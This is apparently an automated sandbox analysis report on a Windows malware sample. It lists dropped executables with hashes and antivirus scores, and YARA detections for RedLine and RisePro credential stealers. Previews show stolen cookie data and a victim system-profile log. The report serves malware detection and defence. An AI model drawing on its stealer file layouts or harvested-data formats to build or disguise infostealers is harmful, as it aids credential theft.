                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 54%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                      Size (bytes):26
                                                                                                                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1905152
                                                                                                                                                                                                                                      Entropy (8bit):7.9481732310150415
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:L2qVJL/mlsMQfk3gCcKpB057h3jI1Egbd:L2qVJrmTX3o3qEyd
                                                                                                                                                                                                                                      MD5:339020815B65530333BF2DDC928AC867
                                                                                                                                                                                                                                      SHA1:018F9C40EEFB58F90341F4EC7E58114972CB571F
                                                                                                                                                                                                                                      SHA-256:55563C7D134BE08E0EB9665CD34993FC90CBE3ED3A464A3D73C4072FED3FCE94
                                                                                                                                                                                                                                      SHA-512:7F176A32ACDDA71FC2DE67ECA2F27C173660F364AD4838C92369D02FB6FA60EBE57AE7A7A6273151F5BAC288C6551D3A58B08ACAAC9837D4BF265A2EC62D8598
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 43%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1166336
                                                                                                                                                                                                                                      Entropy (8bit):7.035580812234568
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:dqDEvCTbMWu7rQYlBQcBiT6rprG8au92+b+HdiJUX:dTvC/MTQYxsWR7au92+b+HoJU
                                                                                                                                                                                                                                      MD5:FB666C3917F960FD67DF0C2C8829D77F
                                                                                                                                                                                                                                      SHA1:028913A79AEC041DCE33A9A9EEEFE9BAAF6624F2
                                                                                                                                                                                                                                      SHA-256:726B25FA91F7D312C60B8673B382880E6DA2FDB03EF452BB907E22F349016028
                                                                                                                                                                                                                                      SHA-512:0500E7D211A3103DAC3C7E2D59307BEE69B5D3A05CD6E74CAD008DAFDA4C0DFDCE183912BEF02C818CA2658480987607736EA0214B15ECC6589A1D0F121E0BC6
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 33%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2295808
                                                                                                                                                                                                                                      Entropy (8bit):7.951970323616638
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:neF1xn14/7RHK8MFoy7bh7bZzLhjDxdX4YgBAsU:+1xn1uhK8MFfB7dHhjdiYYAsU
                                                                                                                                                                                                                                      MD5:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      SHA1:45902F3469CCE67CD21F5904E87BD79A105C9DD5
                                                                                                                                                                                                                                      SHA-256:96A1AE1FA6F9AA36C26C2067939950D4567DEC2B2D7774F779AE199BE8B6BE16
                                                                                                                                                                                                                                      SHA-512:4BDAF2C82379B04A881660E05B121CAE79D300EA308C4D52304FF091F59800C9666630C35DAC247D37CB3478EC96D1388E04EC201AB067B2AD57FE6D4D10ACBA
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 51%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):97792
                                                                                                                                                                                                                                      Entropy (8bit):5.961363779095596
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:iqsiPqBezlbG6jejoigIk43Ywzi0Zb78ivombfexv0ujXyyed2TteulgS6p4:AEmeZYk+zi0ZbYe1g0ujyzdX4
                                                                                                                                                                                                                                      MD5:4CFD179519524269052023E10DE6B866
                                                                                                                                                                                                                                      SHA1:1E92BA2322E341B979D53422CF0E044C4F3B1846
                                                                                                                                                                                                                                      SHA-256:A24A85156CE1A077403B4FFFE4C4E1C592DF412D6495FBA921771C59456B43AF
                                                                                                                                                                                                                                      SHA-512:6477C8DC2BA0F754716EE074BE131BC14A7D616C877210E0A3FBED7EA3FD132F2833518C52211757A8A875018061AE56FCDD7C30B8149EBE91C33763057ED8B9
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: unknown
                                                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe, Author: ditekSHen
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 77%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):97792
                                                                                                                                                                                                                                      Entropy (8bit):5.961363779095596
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:iqsiPqBezlbG6jejoigIk43Ywzi0Zb78ivombfexv0ujXyyed2TteulgS6p4:AEmeZYk+zi0ZbYe1g0ujyzdX4
                                                                                                                                                                                                                                      MD5:4CFD179519524269052023E10DE6B866
                                                                                                                                                                                                                                      SHA1:1E92BA2322E341B979D53422CF0E044C4F3B1846
                                                                                                                                                                                                                                      SHA-256:A24A85156CE1A077403B4FFFE4C4E1C592DF412D6495FBA921771C59456B43AF
                                                                                                                                                                                                                                      SHA-512:6477C8DC2BA0F754716EE074BE131BC14A7D616C877210E0A3FBED7EA3FD132F2833518C52211757A8A875018061AE56FCDD7C30B8149EBE91C33763057ED8B9
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 77%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4621
                                                                                                                                                                                                                                      Entropy (8bit):7.776227586967732
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:P4hMhMb4hMhMJSybyRWmgkSFid8TVBUaNpHcux8WV73:P4r4Yybs83lJBUaN8WV73
                                                                                                                                                                                                                                      MD5:185589F499CED8BABF979510EC43B554
                                                                                                                                                                                                                                      SHA1:D573EAC608B44D180FC2215C650604025270CB6E
                                                                                                                                                                                                                                      SHA-256:9F6B4BC30BCF8E8444854DB0CA3A95E58F22953616778C513A98F5DED596E605
                                                                                                                                                                                                                                      SHA-512:214D55E6F9A10C1108CB59F257FE9325EBC89F484086431195270F10701D76353E0B334AE4F4A89D8EE90E54C0AC1FFAABBC8D00E3B93AA5249746091603DACF
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000054001\amert.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1905152
                                                                                                                                                                                                                                      Entropy (8bit):7.9481732310150415
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:L2qVJL/mlsMQfk3gCcKpB057h3jI1Egbd:L2qVJrmTX3o3qEyd
                                                                                                                                                                                                                                      MD5:339020815B65530333BF2DDC928AC867
                                                                                                                                                                                                                                      SHA1:018F9C40EEFB58F90341F4EC7E58114972CB571F
                                                                                                                                                                                                                                      SHA-256:55563C7D134BE08E0EB9665CD34993FC90CBE3ED3A464A3D73C4072FED3FCE94
                                                                                                                                                                                                                                      SHA-512:7F176A32ACDDA71FC2DE67ECA2F27C173660F364AD4838C92369D02FB6FA60EBE57AE7A7A6273151F5BAC288C6551D3A58B08ACAAC9837D4BF265A2EC62D8598
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 43%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                      Size (bytes):3013
                                                                                                                                                                                                                                      Entropy (8bit):7.737963653983917
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:9g6aElnPtLe9jkXHLjj4zvn+ReEtcP4APVJCrG4wsDV0oNdHgogmszW0AWmGn3KC:XhijkXHL0n+Reisf4DDCoHNzQxAWr3KC
                                                                                                                                                                                                                                      MD5:EFB4F1B5314E7071FAF77E4FFE620625
                                                                                                                                                                                                                                      SHA1:B6972DE71D877F44A8627CEEC4A67EE983671796
                                                                                                                                                                                                                                      SHA-256:B096B7652FB5D41899FB414E4A1994B5663AB231F17D9BA5227DF1B6E7AA42FD
                                                                                                                                                                                                                                      SHA-512:083B633F204837AEAB3993869D9AD509B5F47D2AEA9C4FFEBBF1D07289E49E6B096BA1AE83CFD8548A0A33B0EEBC496D8CDB8408679BE3466B53C548D1E8703D
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\L6h0MKsU674R9uRTEifr_26.zip, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                      Entropy (8bit):4.704346314649071
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                                                                                                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                                                                                                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                                                                                                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                                                                                                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                      Entropy (8bit):4.704346314649071
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                                                                                                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                                                                                                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                                                                                                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                                                                                                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                      Entropy (8bit):4.701195573484743
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                                                                                                                                                                      MD5:2530C45A92F347020337052A8A7D7B00
                                                                                                                                                                                                                                      SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                                                                                                                                                                      SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                                                                                                                                                                      SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                      Entropy (8bit):4.697358951122591
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                                                                                                                                                                                                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                                                                                                                                                                                                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                                                                                                                                                                                                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                                                                                                                                                                                                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                      Entropy (8bit):4.696508269038202
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                                                                                                                                                                                                      MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                                                                                                                                                                                                      SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                                                                                                                                                                                                      SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                                                                                                                                                                                                      SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1026
                                                                                                                                                                                                                                      Entropy (8bit):4.6959554225029665
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                                                                                                                                                                      MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                                                                                                                                                                      SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                                                                                                                                                                      SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                                                                                                                                                                      SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (369), with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):530
                                                                                                                                                                                                                                      Entropy (8bit):5.999391385907715
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:copYxSlufq7gCx7Fbyr4rOSlTfJJADr6HDsZQZ7gC6:KauS79Gr4iSllJALQZ7c
                                                                                                                                                                                                                                      MD5:06ED2CD304730F55A5C7001509E128BE
                                                                                                                                                                                                                                      SHA1:49651485B2CE3D239172BD52BF5A265AB3EB8E18
                                                                                                                                                                                                                                      SHA-256:66851B5AA77B3DEE71B842F53D4E30F664F5A08F9754B9E87B323871981516A4
                                                                                                                                                                                                                                      SHA-512:0163A8537DE695D34865EEB9C872F15A1827644D8797344A2D36E776F174E5901E77AA560488B0D7D7359B3648614F818B85A7D51F59CCDF2831B5715F5A9334
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:.google.com.FALSE./.TRUE.1699018815.1P_JAR.ENC893*_djEwmUj/dRHWNmfhbTB/w+u3HcpAF49UGcxvovgmz9ye9OQyJO9KCFHkRm8=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*...google.com.TRUE./.TRUE.1712238015.NID.ENC893*_djEwFCqquAx+Q1mLxpuZeEBJZSgzAt4Ngo/HHXcYPxMGINXG0MJzCe/y7m5VzpUyfsA6ingOdNobTvWP/YbKYpzg64nmGlCjRU9RpPIjDAuAxGlp5MTMUaOP4iC8aSCuijjqDE5gAdZQ5Jgb0/uEAZ4ssWGDsxXJbqpGbi04viYfPDhBfQ9XKXznqtHW/weYlNZJIGlKZBsCWoEIKfuL56VHKaBt04gLO/XK1/P3nHsp6pSc1x1uk1RRK7hSYUjCY5G/hcpBBjFv74dICDI=_Spn23kok+Q5pGfoIFZdfhpScu2LLLElOWGEpK4fGivY=*..
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):7441
                                                                                                                                                                                                                                      Entropy (8bit):5.368477939782725
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:xf8WZRS2c2KBhA6tsxODsG6v0K1U5PFmXkW+YbANUbg3x:xR82X6tsxPDt1oNm0W/4B
                                                                                                                                                                                                                                      MD5:BC77DAAE5AAB8981DB1DB85E55DEBB7B
                                                                                                                                                                                                                                      SHA1:7E62FA700530FD13FB37FCEF69637CD76DC8AD93
                                                                                                                                                                                                                                      SHA-256:80DC1759862878294C65192F3FBD0A0F03303D910D53332810140CC3731CE4EB
                                                                                                                                                                                                                                      SHA-512:68D6D14FEF0815BB73CFBC39531551675AACCDAADB82FF4E6EED0EE4D059A6EF6BD84D0108771A60B86510D3E000B3AE4713A661BC0C9DE61F08F1C39118FE1B
Malicious:false
Reputation:unknown
Preview:Build: bladak..Version: 1.9....Date: Fri Apr 19 03:29:31 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: cfeb70a35b65616976a5684cd81effed....Path: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe..Work Dir: C:\Users\user\AppData\Local\Temp\adobebQmh7W1i7Wir....IP: 81.181.57.52..Location: US, Atlanta..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 899552 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 19/4/2024 3:29:31..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [332]..csrss.exe [420]..wininit.exe [496]..csrss.exe [504]..winlogon.exe [564]..services.exe [632]..lsass.exe [640]..svchost.exe [752]..fontdrvhost.exe [7
Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
Category:dropped
Size (bytes):4897
Entropy (8bit):2.518316437186352
Encrypted:false
Malicious:false
Reputation:unknown
Process:C:\ProgramData\MPGPH131\MPGPH131.exe
File Type:ASCII text, with very long lines (369), with CRLF line terminators
Category:dropped
Size (bytes):530
Entropy (8bit):5.999391385907715
Encrypted:false
Malicious:false
Reputation:unknown
Process:C:\ProgramData\MPGPH131\MPGPH131.exe
File Type:ASCII text, with CRLF, LF line terminators
Category:dropped
Size (bytes):7486
Entropy (8bit):5.370134377851073
Encrypted:false
Malicious:false
Reputation:unknown
Preview:Build: bladak..Version: 1.9....Date: Fri Apr 19 03:29:39 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: cfeb70a35b65616976a5684cd81effed....Path: C:\ProgramData\MPGPH131\MPGPH131.exe..Work Dir: C:\Users\user\AppData\Local\Temp\adobevqkoBMIvF7c3....IP: 81.181.57.52..Location: US, Atlanta..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 899552 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 19/4/2024 3:29:39..TimeZone: UTC1....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [332]..csrss.exe [420]..wininit.exe [496]..csrss.exe [504]..winlogon.exe [564]..services.exe [632]..lsass.exe [640]..svchost.exe [752]..fontdrvhost.exe [780]..fontdrvhost.exe [78
Process:C:\ProgramData\MPGPH131\MPGPH131.exe
File Type:Unicode text, UTF-8 text, with CRLF, LF line terminators
Category:dropped
Size (bytes):4897
Entropy (8bit):2.518316437186352
Encrypted:false
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):98304
Entropy (8bit):0.08235737944063153
Encrypted:false
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:dropped
Size (bytes):196608
Entropy (8bit):1.121297215059106
Encrypted:false
Malicious:false
Reputation:unknown
Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):5242880
Entropy (8bit):0.03859996294213402
Encrypted:false
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
